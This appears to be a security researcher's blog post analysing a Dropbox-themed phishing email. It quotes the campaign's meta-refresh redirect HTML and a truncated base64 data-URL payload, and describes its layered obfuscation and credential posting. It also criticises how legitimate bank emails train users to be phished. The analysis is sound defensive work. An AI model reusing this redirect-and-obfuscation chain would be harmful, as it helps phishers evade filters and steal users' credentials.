An Anatomy of A Nice Phish
I fear we will never robustly stop phishing, as much because we seem to insist on training users to be phished. Even generic phishing has a tendency to work, and I just received a particularly nice one that is worth examining in detail.
First the bait:
Yes, this is a very generic and unremarkable phish. But at the same time, how many of this sort of email has one seen on a regular basis that is legitimate?
There is also some amusement in how the phish is actually implemented. The link is bit.ly (naturally), which redirects to a .php script on a (presumably hacked) real estate web site. But that link is interesting:
<html><head><META HTTP-EQUIV=”Refresh” CONTENT=”1;URL=https://dl.dropboxusercontent.com/s/pziendhh708cx0z/akomesh-000001-0000.html?dl=0"></head><p><p>
</head></body></html>
Yes, it loads the actual phishing page from dropbox! And instead of just rendering the page, this bit (conveniently hosted on Dropbox) hides itself by doing yet another meta refresh, so that the content is actualyl in the URL bar!
<meta http-equiv=”Refresh” content=”0; url= data:text/html;charset=utf-8;base64,PFNjcmlwdCBMYW5ndWFnZT0nSmF2YXNjcmlwdCc+DQo8IS0tIEhUTUwgRW5jcnlwdGlvbiBwcm92
aWRlZCBieSBpV0VCVE9PTC5jb20gLS0+DQo8IS0tDQpkb2N1bWVudC53cml0ZSh1bmVzY2FwZSgn…
And of course, the content itself is obsfuated Javascript, which does yet another document write and decodes to HTML. The resulting page also fetches another script, this time from https://googledrive.com/host/0B5MfJSZPi35ebDRYeHVEQ1JlTVk (which appears to be a standard Javascript form validator, you don’t want people putting in bogus answers to your phish), and then posts the results to Yet Another (presumably compromised server) which is a “powered by VESTA” landing page.
The phishing itself actually goes to a second part where it wants the phone number, before redirecting to dropbox itself.
Some overall thoughts
1: We’ve trained people to be phished. The bait email looks remarkably similar to what Dropbox sends to people for legitimate purposes, and a little bit of social graph mining and you too can make fake Dropbox emails that really look like the real thing.
2: Dropbox can get an idea of how successful this phish is, at least in terms of page views, since the phishers hosted the dropbox phish on dropbox!
3: Anti-spam techniques may be working (mostly) in terms of preventing “unauthorized” sending. It looks like this was through a compromised account rather than created from whole cloth.
4: So many layers of obfuscation! The phishing email itself was base-64 encoded rather than plaintext. The phishing page was URL shortened, redirected to a compromise site, redirected to dropbox, redirected to a “page” in the URL bar, which used document-write to deencode base-64 encoded Javascript into the page. Just about anything short of an actual browser will be unable to extract the semantics.
5: Did I mention how much we’ve trained users to be phished? Look at this legitimate email:
How is a typical user supposed to know this is legitimate? The last 4 digits of a credit card #? How long until a criminal service offers that data (if they haven’t already?) And this business about “Email security zone”? It’s not like DKIM validated…
Authentication-Results: maihub.ICSI.Berkeley.EDU (amavisd-new); dkim=softfail
(fail, message has been altered) header.i=@info.citibank.com
Authentication-Results: maihub.ICSI.Berkeley.EDU (amavisd-new);
domainkeys=softfail (fail, message has been altered)
header.from=citicards@info.citibank.com
Yeup, that checks out…
